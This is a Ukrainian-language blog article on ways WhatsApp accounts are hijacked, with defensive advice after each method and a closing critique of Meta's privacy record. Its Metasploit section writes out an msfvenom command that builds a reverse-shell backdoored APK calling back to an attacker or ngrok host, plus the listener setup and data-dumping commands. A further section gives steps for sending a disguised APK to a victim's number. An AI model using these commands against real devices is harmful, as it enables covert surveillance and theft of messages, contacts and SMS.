Функція Linked Devices дозволяє використовувати обліковий запис WhatsApp на інших додаткових пристроях без введення даних авторизації – достатньо відсканувати QR-код.

Linked Devices Whatsapp

Зловмисник таким чином отримує доступ до сесії месенджера разом з повним доступом до акаунта, як у ситуації з QRLJacking. Він зможе анонімно використовувати ваш обліковий запис, переглядати історію листування, експортувати чати, поки жертва не скине сесію в Linked Devices або не видалить свій акаунт.

До речі, з допомогою додатка WhatsWeb Scanner можна сканувати QR-коди і використовувати безліч сесій з різних облікових записів на одному смартфоні.

Як захиститися? Дотримуватися фізичної безпеки пристроїв і персональної безпеки. Встановити PIN-код доступу на смартфон. Усі додатки повинні бути захищені паролем і двофакторною авторизацією. Не відключати сповіщення WhatsApp – додаток може повідомити про вхід з нового пристрою. Не передавати смартфон стороннім в руки. Не залишати без догляду. Не передавати в ремонт із встановленим додатком WhatsApp. Перевіряти прив’язані пристрої і активні сесії в налаштуваннях месенджера.

Злам номера WhatsApp через вішинг або перевипуск SIM-картки

Вішинг (voice phishing) – це телефонний фішинг, пов’язаний з соціальною інженерією.

Соціальна інженерія – це інформаційно-психологічні маніпуляції з метою отримати конфіденційну інформацію.

Зловмисник реєструє обліковий запис WhatsApp на своєму смартфоні, вказавши номер телефону жертви. Їй має прийти SMS-повідомлення з кодом активації або підтвердженням. Зловмисник телефонує жертві й обманом пробує змусити повідомити код, наприклад представляючись співробітником технічної підтримки мобільного оператора. Далі отриманий код він вводить на своєму пристрої в додатку WhatsApp й таким чином заново реєструється по номеру жертви. Тим часом обліковий запис жертви стає неактивним.

Hack WhatsApp number
Повідомлення від WhatsApp про те, що номер телефону користувача було зареєстровано на іншому пристрої, через що обліковий запис більше не активний.

Подібним способом зламують WhatsApp через перевипуск SIM-картки – це спеціальна процедура у мобільних операторів, яка дозволяє відновити втрачену або викрадену SIM через дублікат. Зловмисники звертаються у сервісний центр оператора, представляються власниками мобільного номеру й намагаються переконати службу підтримки, що у них викрали телефон або вони загубили сім-картку. Для підтвердження вони можуть назвати останні дзвінки, суму та дату поповнення, а також іншу конфіденційну інформацію. Коли SIM картка у них, вони можуть виконати з номером будь-які дії, отримати доступ до всіх акаунтів, які були прив’язані до нього.

Як захиститися? Реєструйте мобільний номер на паспортні дані або переходьте на контрактне обслуговування. Не відповідайте на дзвінки з підозрілих номерів. Обов’язково власноруч зареєструйтеся в персональному кабінеті свого мобільного оператора й встановіть стійкий пароль входу. Регулярно переглядайте статистику по своєму акаунту, включаючи дзвінки і споживання інтернету. Забороніть віддалений перевипуск SIM. Нікому ніколи не повідомляйте будь-які коди, SMS-активації, PUK та IMSI, серійні номери тощо. Не публікуйте особисті дані в соцмережах (фінансовий номер телефону, дата народження, зображення або серія паспорту). Не переходьте за фішинговими посиланнями і не відправляйте нікому свої конфіденційні дані.

Викрадення облікового запису WhatsApp через фішинг

Фішинг – це вид інтернет-шахрайства, яке здійснюється через електронну пошту.

Знаючи електронну пошту жертви, шахрай нібито від імені служби технічної підтримки WhatsApp відправляє email-листа з проханням перейти за посиланням, інакше акаунт буде забанено. При цьому з допомогою техніки email-спуфінгу він підробив поле відправника, вказавши там support@whatsapp.com або дуже схожий домен. Сам лист максимально оформлений в фірмових кольорах і стилі WhatsApp.

Фішинговий лист Whatsapp
Приклад підробленого фішингового листа нібито від WhatsApp.

У висновку жертва вірить, що цей лист справді від адміністрації WhatsApp й переходить по фішинговому посиланню, яке веде на зловмисний сайт. Там користувача просять вказати код підтвердження, який надійде в SMS. Таким чином відбувається викрадення облікового запису.

Існують й багато інших сценаріїв, які використовуються зловмисниками для зламу WhatsApp через фішинг.

Як захиститися? Не відкривати email-листи, не відповідати, не переходити за посиланнями від незнайомих адресатів. Якщо є сумніви щодо того чи іншого посилання, можна його перевірити з допомогою спеціальних інструментів та сервісів. Перевіряти email-заголовки та SPF/DKIM підписи листа, щоб запевнитися, що лист не підроблено.

Злам акаунта WhatsApp через шкідливий файл

Зловмисник знаючи номер жертви, додає її обліковий запис собі в телефонну книгу й розпочинає діалог. В ході розмови відправляє файл, який містить шкідливий код. Це може бути текстовий документ (PDF/DOCX), відео або звичайна картинка. При цьому нападник застосовує соцінжекнерію та підробляє їх так, щоб вони здавалися максимально легітимними та цікавими. Це можуть бути якісь важливі документи або привабливі фото. Коли жертва відкриває файл, шкідливий код запускається і виконується на її пристрої.

Hack WhatsApp via image
Приклад зламу облікового запису WhatsApp через зображення. Почернуто з досліджень Check Point.

Експлойт може використовувати вразливості у програмному забезпеченні або операційній системі пристрою. У висновку зловмисник повністю бере під контроль мобільний пристрій і може переглядати листування, незважаючи на наскрізне шифрування в месенджері.

Подібну атаку виявили спеціалісти Check Point Research у 2017 році. Зловмисники встигли взламати мільйони акаунтів WhatsApp.

Як захиститися? Завжди оновлювати операційну систему та програмне забезпечення. Не вести спілкування з незнайомими особами, не приймати від них жодних файлів, особливо анімовані GIF або виконувані exe файли. Налаштувати акаунт WhatsApp на максимальну приватність. Не переходити за посиланнями. Здійснювати регулярне антивірусне сканування. Періодично очищати накопичувач мобільного пристрою від зайвих файлів.

Злам WhatsApp на ОС Android через Metasploit Framework

Metasploit Framework – це культовий інструмент етичного хакінгу, який містить величезну кількість модулів для злому та застосовується в тестуваннях на проникнення. З його допомогою можна створювати й запускати експлойти, бекдори, шели, пейлоади. Він служить своєрідним містком між системою атакуючого і системою жертви.

Metasploit

Способів як застосувати посередництво Metasploit для зламу WhatsApp – чимало. Розглянемо один з них – згенерувати модифікований APK-файл і встановити його на пристрої жертви.

Основна вимога для успішності проведення атаки: зловмисник і жертва мають перебувати в одній мережі, наприклад підключені до однієї точки доступу Wi-Fi. При виконанні команди ping – пакети мають поступати в обох напрямках.

Алгоритм атаки наступний:

  1. Модифікувати будь-який APK додаток, прошивши в ньому бекдор.
  2. Через фішинг змусити жертву скачати та встановити шкідливий додаток.
  3. Запустити Metasploit і через експлойт привести бекдор в дію.

Отже, зловмисник запускає Metasploit в середовищі Linux й з допомогою модуля meterpreter створює на базі готового APK-файлу модифікований шкідливий мобільний додаток:

msfvenom -p android/meterpreter/reverse_tcp -x ~/originalapp.apk LHOST=local_ip LPORT=tcp_port -f raw -o fakeapp.apk

  • LHOST – тут він вказує або свою локальну IP-адресу, якщо хакер і жертва в одній мережі; або хост веб-сервера ngrok (наприклад, 0.tcp.eu.ngrok.io), якщо жертва знаходиться в іншій мережі і має доступ в інтернет.
  • LPORT – аналогічно вказує або локальний порт, або порт ngrok (тобто, tcp.eu.ngrok.io:xxxx).

Metasploit compiling apk

Після виконання файл буде збережено у поточній директорії.

Увага: Аби Metasploit зміг успішно скомпілювати і підписати APK, обов’язково повинні бути встановлені наступні утиліти: apktool, apksigner, zipalign.

Тепер хакеру необхідно доставити цей додаток на цільовий пристрій. Способів як це зробити – безліч. Все залежить від навичок та фантазії. Найпоширеніший – з допомогою фреймворків ADVPhishing, HiddenEye, Gophish, HTTrack, або Social Engineering Tool (SEToolkiT) створити фішинговий сайт і через портативний веб-сервер ngrok або vps опублікувати його в інтернеті.

Phishing with Ngrok
Приклад того як хакер прокидає локальний хост з фішинговим сайтом у публічну мережу Інтернет з допомогою Ngrok.
Phishing WhatsApp example
Фішингова сторінка з закликом до дії, замаскована під маркетплейс додатків Google Play Store. Користувач клікає по банеру і завантажує шкідливий apk-файл мобільного додатку.

Жертва переходить на підроблений сайт і нічого не підозрюючи вантажить на свій пристрій додаток, а далі встановлює його (надаючи усі дозволи) і запускає. Бекдор тут же приходить в дію, відкривається порт який зв’язує комп’ютер атакуючого з мобільним пристроєм жертви.

Тим часом хакер вже попередньо запустив Metasploit і чекає коли розпочнеться зворотній сеанс:

use exploit/multi/handler
set Payload android/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT XXXX
run

Все! Як тільки мережевий міст між обома сторонами налагодиться, у командному рядку фреймворка Metasploit з’явиться повідомлення про успішне відкриття першої сесії Meterpreter:

Metasploit reverse tcp

Пристрій жертви зламано! Далі хакер просто починає раз за разом витягувати потрібну йому інформацію, проводить пост-експлуатацію, користуючись можливостями Metasploit й командами meterpreter, наприклад:

  • sysinfo – базова технічна інформація про операційну систему Android жертви;
  • ps – список активних процесів в сеансі поточного користувача;
  • ifconfig – вивести список мережевих інтерфейсів;
  • route – показати таблицю маршрутів мережевого з’єднання;
  • pwd – отримати шлях поточної директорії;
  • getuid – вивести ідентифікатор поточного користувача;
  • shell – перейти в командну оболонку безпосередньо терміналу Android;
  • screenshot – зробити скріншот дисплею користувача;
  • screenshare – показати дисплей користувача в реальному часі;
  • localtime – вивести локальний час на смартфоні користувача;
  • webcam_list – вивести список відеокамер пристрою;
  • upload – завантажити файл на пристрій;
  • download – завантажити файл з пристрою;
  • check_root – перевірка чи рутований смартфон;
  • dump_sms – зробити дамп усіх SMS-повідомлень і зберегти в файл;
  • dump_contacts – зробити дамп контактів користувача;
  • dump_calllog – зробити дамп останніх стільникових дзвінків на пристрої;
  • send_sms – відправка SMS-повідомлень з телефону жертви;
  • app_list – список встановлених додатків;
  • app_run – запуск додатків;
  • app_install – встановити додаток;
  • ….повний список команд можна отримати скориставшись довідкою, набравши в консолі help.

Таким чином, подібні маніпуляції у поєднанні з різними іншими практиками рано чи пізно приведуть до повного зламу і компрометації не лише самого месенджера WhatsApp, а й усієї операційної системи та пов’язаних з нею пристроїв.

Хакер зможе періодично зупиняти та створювати нові сесії, підключатися до смартфона жертви, таємно встановлювати шпигунські додатки, віддалено керувати пристроєм.

apk backdoor scheme

Примітка: В останніх версіях ОС Android 14+ вищеописана атака не пройде через службовий модуль, який по замовчуванню перевіряє apk-файли на шкідливий код. Окрім того, спрацьовує захист додатків від Google Play Protect, що завадить віддаленому виконанню шкідливого коду. Якщо хакер спробує переслати фейковий apk жертві через пошту GMAIL – йому теж це не вдасться, адже спрацює вбудований антивірусний сканер Google.

Як захиститися? Своєчасно оновлювати операційну систему Android до останньої версії і всі її компоненти. Майте на увазі, що практично усі Андроїди до 13-14 версії є вразливими. У жодному випадку не використовуйте застарілі Android версії v.4.0-8.0. Не підключайтесь до невідомих Wi-Fi мереж, якщо у вас немає VPN і відповідних систем захисту. Не завантажуйте додатки з невідомих джерел. Звіряйте контрольні суми завантажених додатків. Не вимикайте Google Play Protect.

Злам WhatsApp на ОС Android через фальшивий PDF

Даний метод зламу побудований на вразливості, чи то пак недоопрацюванні WhatsApp, яка допускає маніпуляції з розширенням надісланих файлів. Він розрахований на банальну неуважність та необізнаність користувачів, тобто на людський фактор.

Суть проста – згенерувати в Metasploit шкідливий APK-файл з реверс-шелом, підробити його під PDF-документ (при цьому залишаючи оригінальний MIME-тип application/vnd.android.package-archive, щоб він міг виконатись як APK, а не PDF) і надіслати жертві.

Соціальний інженер переконує її, що це якийсь важливий документ, жертва клікає, завантажує файл і запускає на встановлення. Ну а далі шел приходить в дію і мобільний потрапляє під контроль зловмисника.

Зробити такий PDF-файл банальним перейменуванням APK не вийде. Тому ми будемо використовувати додаткові інструменти і технології, а саме – Python-скрипт, розміщений на GitHub першовідкривача цього методу (0x6rss) та онлайн-платформу UltraMsg.com, яка дозволяє безкоштовно використовувати преміум-функції WhatsApp API.

Отже, алгоритм такий:

  1. Реєструємося на платформі ultramsg.com
  2. Створюємо новий інстанс.
  3. Отримуємо дані доступу по API.
  4. Завантажуємо собі на локальний комп’ютер скрипт wp.py.
  5. Відкриваємо скрипт в редакторі і прописуємо в ньому дані для доступу по API, а саме: url інстансу, токен API, url шкідливого файлу (його потрібно попередньо опублікувати на сервері в інтернеті, наприклад з допомогою ngrok), номер телефону жертви.
  6. Повертаємося в ultramsg.com і скануємо смартфоном QR-код для того, щоб додаток міг синхронізуватися з вашим сеансом WhatsApp і використати його для надсилання даних (необхідно попередньо встановити і активувати WhatsApp на своєму смартфоні).
  7. Запускаємо у командному рядку скрипт: python3 wp.py
  8. UltraMsg через API WhatsApp успішно надсилає повідомлення, надавши у відповідь рядок: {"sent":"true","message":"ok","id":3}

Злам WhatsApp на ОС Android через шкідливий Python або PHP скрипт

WhatsApp дозволяє виконання Python та PHP скриптів через свій додаток. Зловмисник може створити експлойт з реверс-шелом й відправити його жертві. Після кліку шел автоматично приходить в дію й зловмисник отримує віддалений доступ до пристрою.

Цей хак виявив індійський дослідник кібербезпеки Saumyajeet Das. Деталі він розмістив на своєму GitHub. Спеціаліст знайшов три типи файлів, запуск яких клієнт WhatsApp не блокує: .PYZ (програма Python ZIP), .PYZW (програма PyInstaller) і .EVTX (файл журналу подій Windows). Те саме відбувається з скриптами PHP.

Як повідомили фахівці видання BleepingComputer, месенджер блокує виконання лише наступних розширень файлів: .EXE, .COM, .SCR, .BAT, .DLL, .HTA, VBS і Perl. Виконати їх можна було лише після попереднього збереження на диск.

Дослідник повідомив про проблему в Meta, але вони закрили її як n/a, обгрунтувавши це тим, що це не вина користувача, а не додатка.

Як захистити свій акаунт в WhatsApp?

Рекомендації безпеки облікового запису в WhatsApp

Додаткові поради і рекомендації безпеки WhatsApp:

  1. Не реєструйте акаунт WhatsApp на свій фінансовий номер телефону. При цьому не використовуйте одноразові номери, придбані в онлайн-сервісах – їх можуть перереєструвати. Краще придбати SIM-картку закордонного оператора, яку складно перевипустити або пробити по базам.
  2. Вмикайте двофакторну верифікацію – це захистить обліковий запис від несанкціонованого доступу.
  3. Перевіряйте активні сесії месенджера на інших пристроях. Не накопичуйте велику кількість сесій, застарілі – скидайте.
  4. Вимкніть автоматичне завантаження файлів в WhatsApp. Це убезпечить від завантаження шкідливих файлів. Не додавайте в контакти і не приймайте файли від знайомих осіб. Зловмисник може відправити троян або руткіт під виглядом звичайного смайлика, документа, відеофайлу чи зображення.
  5. Уникайте сумнівних посилань. Не переходьте по ним. Користуйтесь інструментами для перевірки URL на фішинг. За потреби вимкніть функцію поперендього перегляду (прев’ю) посилань.
  6. Обмежте коло користувачів, які можуть бачити коли ви останній раз були онлайн. Це убезпечить від таймінг-атаки.
  7. Обмежте тих, хто може бачити ваше фото профілю. Не використовуйте в якості фото профілю свої портретні, паспортні фото, де вас добре видно – зловмисники можуть деанонімізувати вас або скопіювати вашу особу. Для створення креативного аватару користуйтесь AI або Photoshop.
  8. Обмежте тих, хто може бачити ваш статус. Не публікуйте у статусах якусь важливу ключову інформацію, як от номера телефонів.
  9. За потреби увімкніть функцію приховання IP-адреси.
  10. Використовуйте функцію “Закриті бесіди” для важливих обговорень.
  11. Увімкніть опцію ігнорування дзвінків від незнайомих номерів телефону.
  12. За потреби, вимкніть звіти про прочитання.
  13. Обмежте тих, хто може додавати вас в групи.
  14. Не використовуйте неофіційні та застарілі версії додатків WhatsApp. Завантажуйте їх тільки з офіційних джерел.
  15. Не передавайте нікому свій смартфон в руки.
  16. Використовуйте складні паролі, які важко підібрати.
  17. Якщо ви є модератором чату, уважно верифікуйте і фільтруйте всіх, хто знаходиться в ньому.
  18. За потреби налаштуйте автоматичне видалення повідомлень за таймером.
  19. Очищуйте історію чатів, якщо вони вам не потрібні.

Висновки і заключні тези

WhatsApp і Марк Цукерберг

Історія WhatsApp – це історія злету та падіння. Марк Цукерберг отримав у спадок величезну цінність – один з найбільших технологічних винаходів людства. А разом з тим довіру мільярдів. Здавалось, необхідно лише підтримувати та розвивати цей успіх, даруючи користувачам омріяний ЦИФРОВИЙ ДОБРОБУТ. Але Meta пішли іншим шляхом. Мабуть, ними керували більше гроші та вигода, аніж ідея та покликання. Як казав Браян Ектон: “Вони просто дуже хороші бізнесмени”.

WhatsApp – це дітище Facebook. І цим все сказано. Реєструючись у WhatsApp, ви фактично реєструєтесь в системі Meta. Увесь трафік “перетікає” по серверам Цукерберга. Ви повинні знати про це, перш ніж встановлювати цей додаток.

Facebook не приховує, що може передавати користувацькі дані третім особам. Інтернетом гуляє безліч історій як Facebook пропонує своїм користувачам долучати у друзі тих, з ким вони раніше спілкувалися у WhatsApp. Він не раз ставав причиною серйозних витоків даних. Багато хто вважає, що саме збір та продаж даних і є основною причиною “безкоштовності” продуктів Meta.

Гасло WhatsApp “Конфіденційність у наших генах” на сьогодні сприймається лише як маркетингова обгортка. Іронічними звучать слова Яна Кума про WhatsApp, які він виказав в інтерв’ю журналу WIRED у 2014 році:

«Я виріс у суспільстві, де все, що ти робиш, підслуховувалося, записувалося, доносилося. Коли ми були дітьми, у мене були друзі, які потрапляли в біду, розповідаючи анекдоти про комуністичних лідерів. Я пам’ятаю, як чув від батьків розповіді про таких дисидентів, як Андрій Сахаров, засуджений до заслання через свої політичні погляди, як Солженіцин, навіть про місцевих дисидентів, яким це набридло ніхто не повинен мати права підслуховувати, інакше ви станете тоталітарною державою, з якої я втік у дитинстві, щоб приїхати в цю країну, де є демократія і свобода слова.

Люди повинні відрізняти нас від таких компаній, як Yahoo! і Facebook, які збирають ваші дані та зберігають їх на своїх серверах. Ми хочемо знати якомога менше про наших користувачів. Ми не знаємо вашого імені, вашої статі… Ми розробили нашу систему максимально анонімною. Ми не керуємося рекламою, тому нам не потрібні персональні бази даних».

Незважаючи на велику кількість різних функцій, у WhatsApp немає заборони на скріншоти й відсутня опція приховання набору клавіатури. Додаток не фільтрує/сканує деякі розширення файлів, котрі можуть надсилати користувачі, що наражає на небезпеку. Групові чати і канали WhatsApp поки що не можуть конкурувати з Telegram чи Matrix через обмеження щодо кількості учасників.

Та найбільший недолік, на мою думку, полягає у розкритті номеру телефона. Коли створювався WhatsApp, мати ідентифікатор у якості мобільного – було круто і дешево, адже він служив альтернативою дороговартісним SMS/MMS. Однак сьогодні, це більше ризик, аніж перевага. Від афер з номерами телефону (смішинг, вішинг, атака SS7, перевипуск SIM-карт) найбільше потерпають саме користувачі WhatsApp. На сьогодні, більшість приватних месенджерів дозволяють приховати номер. WhatsApp – ні.

Завдяки постійним інцидентам безпеки, пов’язаним з NSO Group, WhatsApp нажив собі дурну славу “бекдора”. І власники навіть не намагаються змінити імідж. Месенджер продовжує бити рекорди за кількістю судових позовів і скандалів, використовуватись як інструмент несанкціонованого стеження за політиками, журналістами, нонкомформістами, дисидентами по всьому світу.

Й не дивно, адже Meta/WhatsApp – це повністю централізований додаток з закритим вихідним кодом і сильною цензурою. Більше тисячі людей модерують Facebook і WhatsApp. Вони можуть отримувати доступ до широкого набору користувацьких даних. А ще WhatsApp системно співпрацює зі спецслужбами й правохоронними органами по всьому світу.

Що цікаво, люди які зареєстровані у Whatsapp в різних країнах – підпадають під різні юрисдискції, котрі передбачають різні рівні конфіденційності додатку. Тобто, правила WhatsApp для всіх неоднозначні. Ось чому не варто дивуватися, коли хтось говорить, що має інший досвід користування. Довіряйте не тому, що кажуть або написано на упаковці, а побаченому, почутому і перевіреному.

До речі, WhatsApp як компанія знімає з себе відповідальність за використання їх продукту. Тобто, якщо вас зламає NSO через якусь діру WhatsApp – це буде ваша вина. Ви добровільно погодились використовувати WhatsApp на свій страх і ризик.

На мою думку, об’єднувати орієнтований на приватність месенджер і гігантську соцмережу з такою репутацією у єдину платформу – було жахливою помилкою.

Сама ідея миттєвого обміну повідомленнями, яку реалізував WhatsApp, безумовно є проривом в інформаційних технологіях. І варто подякувати творцям Яну Куму та Браяну Ектону. По суті WhatsApp запустив цілу індустрію месенджерів, відкрив дорогу Signal, Threema, Element, Briar та іншим…

Але мій вердикт незмінний – я не рекомендую WhatsApp людям, які дбають про безпеку і приватність.

Пам’ятайте – безкоштовний сир лише у мишоловці!

Додаткові посилання

F.A.Q. WhatsApp
WhatsApp F.A.Q. Search
WhatsApp Terms
WhatsApp Privacy Policy
WhatsApp Blog
WhatsApp Brand
WhatsApp Facebook
WhatsApp Twitter
WhatsApp GitHub
WhatsApp LinkedIn
WhatsApp Reddit
Wikipedia. WhatsApp
Wikipedia. Jan Koum
Wikipedia. Brian Acton
Brian Acton Official Facebook Page
Brian Acton Twitter
Jan Koum Twitter
Youtube. What’s Up WhatsApp? (Jan Koum, CEO at WhatsApp & David Rowan) | DLD14
Surveillance Self-defense. How to: Use WhatsApp on Android
Medium.com. Grugq. Operational WhatsApp.
Benedict Evans. Whatsapp and $19bn
Medium.com: Tag WhatsApp
Reddit. 5 Reasons Not to Use WhatsApp

👉 Читайте також:

Зміст статті

ПОДІЛИТИСЬ У СОЦМЕРЕЖАХ:

5 1 голос
Рейтинг статті
Підписатися
Сповістити про
guest
2 Коментарі
Старіші
Новіші Найпопулярніші
Вбудовані Відгуки
Переглянути всі коментарі
Валентин
Валентин
3 місяців тому

Дякую автору за статті по ватсапу та телеграму. Чи чекати таку ж статтю про вайбер? І ще б хотілося про українські месенджери: Dober, Lecksis

KR. Laboratories
Адмін
KR. Laboratories
3 місяців тому
Відповісти  Валентин

Звичайно, очікуйте! Матеріал про Вайбер вже в процесі. По українським месенджерам – тестуємо. Просимо підтримати нас дружнім донатом: BTC 13CGpPW6Ciir6XvCHuXXn53Vtgtm3AVSnL

2
0
Поставте запитання й отримайте відповідь!x
Отримати комерційну пропозицію
Оформити заявку
Замовити консультацію
Замовити дзвінок

Вкажіть, будь ласка, контактний номер телефону. Наш менеджер миттєво зв’яжеться з Вами!